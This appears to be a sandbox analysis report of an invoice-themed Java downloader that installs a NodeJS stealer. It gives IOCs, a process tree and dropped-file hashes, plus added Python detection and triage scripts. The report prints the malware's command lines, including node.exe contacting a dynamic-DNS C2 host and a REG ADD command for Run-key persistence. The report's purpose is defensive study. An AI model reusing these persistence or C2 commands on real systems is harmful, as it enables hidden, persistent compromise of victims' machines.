Rechnung 1.jar

General

Target: Rechnung 1.jar (German: "Invoice 1")
Filesize: 50KB
Completed: 24-11-2020 19:30
Score: 10/10
MD5: 5847b21081ad895a7af96259f5ec0d59
SHA1: a690cb52bbb216fa181d700df67181c90c31d014
SHA256: bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1

Malware Config
Signatures 8

  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exe (PIDs 4000, 1020, 504)

    Reported IOCs

    pid   process
    4000  node.exe
    1020  node.exe
    504   node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry

    Reported IOCs

    description      ioc                                                                                                          process
    Key created      \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\75b8ffbb-a237-46bf-95d5-27d50d438190 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""  reg.exe

    Two traits make this Run value easy to hunt for: the value name is a GUID rather than a product name, and the data launches a VBScript under the user's profile (C:\Users\Admin\qhub\node\2.0.10\boot.vbs) through cmd /D /C. That boot.vbs does not appear in the Downloads list below, so its contents are not available in this report.
  • JavaScript code in executable

    Reported IOCs

    resource                                      yara_rule
    behavioral2/files/0x000100000001aba0-163.dat  js
    behavioral2/files/0x000100000001aba0-166.dat  js
    behavioral2/files/0x000100000001aba0-170.dat  js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow  ioc
    21    wtfismyip.com
    22    wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments. Note that reading ProcessorNameString and ~MHz under HARDWARE\DESCRIPTION\System\CentralProcessor\N is exactly what Node's os.cpus() (libuv's uv_cpu_info) does on Windows, so any Node script that calls it will trigger this signature; treat it as host fingerprinting and a weak evasion indicator on its own.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    description        ioc                                                                                  process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exe (PIDs 4000, 1020, 504)

    Reported IOCs

    pid   process   events
    4000  node.exe  4
    1020  node.exe  4
    504   node.exe  10
  • Suspicious use of WriteProcessMemory
    java.exe, javaw.exe, node.exe (x3), cmd.exe

    Reported IOCs (each write is reported twice)

    description                        pid   process    target process
    PID 636 wrote to memory of 2220    636   java.exe   javaw.exe
    PID 2220 wrote to memory of 4000   2220  javaw.exe  node.exe
    PID 4000 wrote to memory of 1020   4000  node.exe   node.exe
    PID 1020 wrote to memory of 504    1020  node.exe   node.exe
    PID 504 wrote to memory of 4060    504   node.exe   cmd.exe
    PID 4060 wrote to memory of 4020   4060  cmd.exe    reg.exe

    Every write is from a parent into the child it has just spawned (the pairs are exactly the parent/child edges of the process tree below), so this signature records process creation rather than injection into a foreign process. Its value here is the chain it documents: java.exe -> javaw.exe -> node.exe -> node.exe -> node.exe -> cmd.exe -> reg.exe.
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"
    Suspicious use of WriteProcessMemory
    PID:636
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp
      Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:1020
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:504
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:4060
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4020
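The signatures and process tree above reduce to a handful of host-side detections: node.exe launched from a user-profile directory with a --hub-domain argument, reg.exe writing a GUID-named HKCU Run value whose data wraps a script in cmd /D /C, and DNS lookups to an IP-echo service or a dynamic-DNS C2 host. The following is an added example (not Triage's code or the malware author's) that replays the chain from this report as constructed Sysmon-style process-creation (EID 1) and DNS (EID 22) records and runs those three rules over them; the benign OneDrive Run entry, the IP-lookup watch-list beyond wtfismyip.com and the dynamic-DNS suffixes beyond .ddns.net are assumptions added for illustration.

```python
"""Offline detection pass over constructed process-creation and DNS events that
replay the chain in this report. Added example, not Triage's code; fields mirror
Sysmon EID 1 / EID 22 but every record is built from the report's process tree
and flows (the OneDrive reg.exe entry is an invented benign control)."""
import re

NODE = r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe"
BOOT_JS = r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js"
RUN = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
REG_CMD = (r'REG ADD "' + RUN + r'" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F '
           r'/D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""')

EVENTS = [  # id 1 = process create, id 22 = DNS query (Sysmon numbering)
    {"id": 1, "pid": 636, "ppid": 0, "image": r"C:\ProgramData\Oracle\Java\javapath\java.exe",
     "cmd": r'java -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"'},
    {"id": 1, "pid": 2220, "ppid": 636, "image": r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
     "cmd": r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp'},
    {"id": 1, "pid": 4000, "ppid": 2220, "image": NODE, "cmd": NODE + " - --hub-domain september101991.ddns.net"},
    {"id": 1, "pid": 1020, "ppid": 4000, "image": NODE, "cmd": NODE + " " + BOOT_JS + " --hub-domain september101991.ddns.net"},
    {"id": 1, "pid": 504, "ppid": 1020, "image": NODE, "cmd": NODE + " " + BOOT_JS + " --hub-domain september101991.ddns.net"},
    {"id": 1, "pid": 4060, "ppid": 504, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /d /s /c "' + REG_CMD + '"'},
    {"id": 1, "pid": 4020, "ppid": 4060, "image": r"C:\Windows\system32\reg.exe", "cmd": REG_CMD},
    # Constructed benign control: a legitimate-looking Run value that also points into the profile.
    {"id": 1, "pid": 9999, "ppid": 0, "image": r"C:\Windows\system32\reg.exe",
     "cmd": r'REG ADD "' + RUN + r'" /V OneDrive /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"'},
    {"id": 22, "pid": 504, "query": "wtfismyip.com"},
    {"id": 22, "pid": 4000, "query": "september101991.ddns.net"},
]

PROFILE_PATH = re.compile(r"[a-z]:\\users\\", re.I)
GUID = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
RUN_KEY = re.compile(r"HK(?:CU|EY_CURRENT_USER)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)
VALUE_NAME = re.compile(r'/V\s+"?([^"\s]+)', re.I)
VALUE_DATA = re.compile(r'/D\s+"(.+)"\s*$', re.I)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|hta)\b", re.I)
# Assumed watch-lists: only wtfismyip.com and the .ddns.net suffix come from the report.
IP_LOOKUP_HOSTS = {"wtfismyip.com", "api.ipify.org", "icanhazip.com", "ipinfo.io"}
DYNDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from the root ancestor down to pid, following ppid links."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def analyze(events):
    findings = []
    for e in events:
        if e["id"] == 1:
            image = basename(e["image"])
            if image == "node.exe" and PROFILE_PATH.match(e["image"]) and "--hub-domain" in e["cmd"]:
                findings.append({"rule": "node_from_profile_with_hub_domain", "pid": e["pid"],
                                 "chain": ancestry(events, e["pid"])})
            elif image == "reg.exe" and RUN_KEY.search(e["cmd"]):
                name_m, data_m = VALUE_NAME.search(e["cmd"]), VALUE_DATA.search(e["cmd"])
                name = name_m.group(1) if name_m else ""
                data = data_m.group(1) if data_m else ""
                reasons = []
                if GUID.match(name):
                    reasons.append("guid_value_name")
                if data.lower().startswith("cmd") and SCRIPT_EXT.search(data):
                    reasons.append("cmd_wrapped_script")
                if PROFILE_PATH.search(data):
                    reasons.append("target_in_user_profile")  # supporting evidence only
                if [r for r in reasons if r != "target_in_user_profile"]:
                    findings.append({"rule": "run_key_persistence", "pid": e["pid"],
                                     "value": name, "data": data, "reasons": reasons})
        elif e["id"] == 22:
            q = e["query"].lower()
            if q in IP_LOOKUP_HOSTS:
                findings.append({"rule": "external_ip_lookup", "pid": e["pid"], "query": q})
            elif q.endswith(DYNDNS_SUFFIXES):
                findings.append({"rule": "dynamic_dns_c2_candidate", "pid": e["pid"], "query": q})
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The Run-key rule deliberately does not fire on "points into the user profile" alone, since legitimate per-user software (the OneDrive control above) does the same; it needs the GUID value name or the cmd-wrapped script. On a real host the same three rules translate directly to Sysmon/EDR queries keyed on Image, ParentImage, CommandLine and QueryName.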
Downloads

  • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    MD5     d41d8cd98f00b204e9800998ecf8427e
    SHA1    da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
    (All four digests are those of empty input: this is a zero-byte file written by the Oracle JRE usage tracker, not attacker content.)

  • C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp
    MD5     5847b21081ad895a7af96259f5ec0d59
    SHA1    a690cb52bbb216fa181d700df67181c90c31d014
    SHA256  bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1
    SHA512  cb844a4b2e976bad6d44c316b9718a2f795b00b91690cfd340ad4e7782eca279f58ff74cc79bc63d9d79e5aa8f232c2fc3e5cdb8b71f8d7a8f125e501d80224f
    (Byte-identical to the submitted Rechnung 1.jar: the downloader copies itself to %TEMP% under a .tmp name and re-launches that copy with javaw.exe -jar, as the process tree shows.)

  • C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js
    MD5     3859487feb5152e9d1afc4f8cd320608
    SHA1    7bf154c9ddf3a71abf15906cdb60773e8ae07b62
    SHA256  8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
    SHA512  826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

  • C:\Users\Admin\node-v14.12.0-win-x64\node.exe (listed three times with identical hashes; one file)
    MD5     f0b11a5823c45fc2664e116dc0323bcb
    SHA1    612339040c1f927ec62186cd5012f4bb9c53c1b9
    SHA256  16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
    SHA512  0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

  • memory/504-169-0x0000000000000000-mapping.dmp
  • memory/504-171-0x00000243A6680000-0x00000243A6681000-memory.dmp
  • memory/1020-165-0x0000000000000000-mapping.dmp
  • memory/1020-167-0x0000032CC8B80000-0x0000032CC8B81000-memory.dmp
  • memory/2220-52-0x0000000000000000-mapping.dmp
  • memory/4000-164-0x000003F791540000-0x000003F791541000-memory.dmp
  • memory/4000-162-0x0000000000000000-mapping.dmp
  • memory/4020-173-0x0000000000000000-mapping.dmp
  • memory/4060-172-0x0000000000000000-mapping.dmp
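The dropped-file list is more useful once it is collapsed by hash: the .timestamp entry carries the digests of empty input, the .tmp carries the digests of the submitted sample, and node.exe appears three times for one file. The following is an added example (not Triage's code) that transcribes the listing above and applies those checks; the tag names and the script/PE extension sets are the editor's own choices.

```python
"""Triage of the Downloads list: collapse drops by hash, flag zero-byte entries,
flag drops byte-identical to the submitted sample, and mark what still needs a
known-good comparison. Added example, not Triage's code; DROPS is transcribed
from this report."""
import hashlib
from collections import defaultdict

SAMPLE_NAME = "Rechnung 1.jar"
SAMPLE_SHA256 = "bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1"

DROPS = [  # (path, sha256) exactly as listed in the report, duplicates included
    (r"C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp",
     "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
    (r"C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp",
     "bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1"),
    (r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js",
     "8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13"),
] + [(r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
      "16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99")] * 3


def digests(data: bytes) -> dict:
    """All four digests the report shows, so a local file can be matched line by line."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256", "sha512")}


EMPTY = digests(b"")  # digests of a zero-byte file


def extension(path: str) -> str:
    name = path.rsplit("\\", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def triage(drops, sample_name, sample_sha256):
    by_hash = defaultdict(list)
    for path, sha256 in drops:
        by_hash[sha256.lower()].append(path)
    out = []
    for sha256, paths in by_hash.items():
        tags = []
        if sha256 == EMPTY["sha256"]:
            tags.append("zero_byte")
        if sha256 == sample_sha256.lower():
            tags.append("self_copy_of_sample")
            if {extension(p) for p in paths} != {extension(sample_name)}:
                tags.append("renamed")  # same bytes dropped under a different extension
        if len(paths) > len(set(paths)):
            tags.append("duplicate_listing")
        exts = {extension(p) for p in paths}
        if exts & {".js", ".vbs", ".jse", ".wsf", ".hta"}:
            tags.append("script")
        if exts & {".exe", ".dll"}:
            tags.append("pe_check_against_known_good")
        out.append({"sha256": sha256, "paths": sorted(set(paths)), "tags": tags})
    return out


if __name__ == "__main__":
    for row in triage(DROPS, SAMPLE_NAME, SAMPLE_SHA256):
        print(row["sha256"][:12], row["tags"], row["paths"])
```

The pe_check_against_known_good tag is a reminder, not a verdict: to confirm that the dropped node.exe is an unmodified Node 14.12.0 binary, extract node.exe from the official node-v14.12.0-win-x64.zip and compare its SHA256 with the one above (the SHASUMS256.txt that Node publishes covers the archive, not the executable inside it).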